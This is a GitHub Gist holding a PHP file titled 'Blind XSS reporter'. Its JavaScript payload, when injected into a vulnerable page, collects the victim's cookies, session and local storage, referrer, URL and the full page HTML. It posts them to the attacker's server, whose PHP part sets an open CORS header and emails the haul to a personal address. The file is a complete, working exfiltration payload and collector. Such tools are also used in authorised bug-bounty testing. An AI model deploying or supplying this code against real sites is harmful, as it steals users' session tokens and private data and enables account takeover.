Skip to content

Instantly share code, notes, and snippets.

@insi2304

insi2304/index.php

Created December 31, 2019 09:01
Show Gist options
  • Save insi2304/335f8fecfdef46ec6660af72fa914c20 to your computer and use it in GitHub Desktop.
Save insi2304/335f8fecfdef46ec6660af72fa914c20 to your computer and use it in GitHub Desktop.
Download ZIP
Blind XSS reporter
Raw
index.php
var mailer = '<?php echo "//" . $_SERVER["SERVER_NAME"] . $_SERVER["REQUEST_URI"] ?>';
var msg = 'USER AGENT\n' + navigator.userAgent + '\n\nTARGET URL\n' + document.URL;
msg += '\n\nREFERRER URL\n' + document.referrer + '\n\nREADABLE COOKIES\n' + document.cookie;
msg += '\n\nSESSION STORAGE\n' + JSON.stringify(sessionStorage) + '\n\nLOCAL STORAGE\n' + JSON.stringify(localStorage);
msg += '\n\nFULL DOCUMENT\n' + document.documentElement.innerHTML;
var r = new XMLHttpRequest();
r.open('POST', mailer, true);
r.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
r.send('origin=' + document.location.origin + '&msg=' + encodeURIComponent(msg));
<?php
header("Access-Control-Allow-Origin: " . $_POST["origin"]);
$origin = $_POST["origin"];
$to = "yourpersonalemailid";
$subject = "Blind XSS Report for " . $origin;
$ip = "Requester: " . $_SERVER["REMOTE_ADDR"] . "\nForwarded For: ". $_SERVER["HTTP_X_FORWARDED_FOR"];
$msg = $subject . "\n\nIP ADDRESS\n" . $ip . "\n\n" . $_POST["msg"];
$headers = "From: blindxssreport@vpsdomain" . "\r\n";
if ($origin && $msg) {
mail($to, $subject, $msg, $headers);
}
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment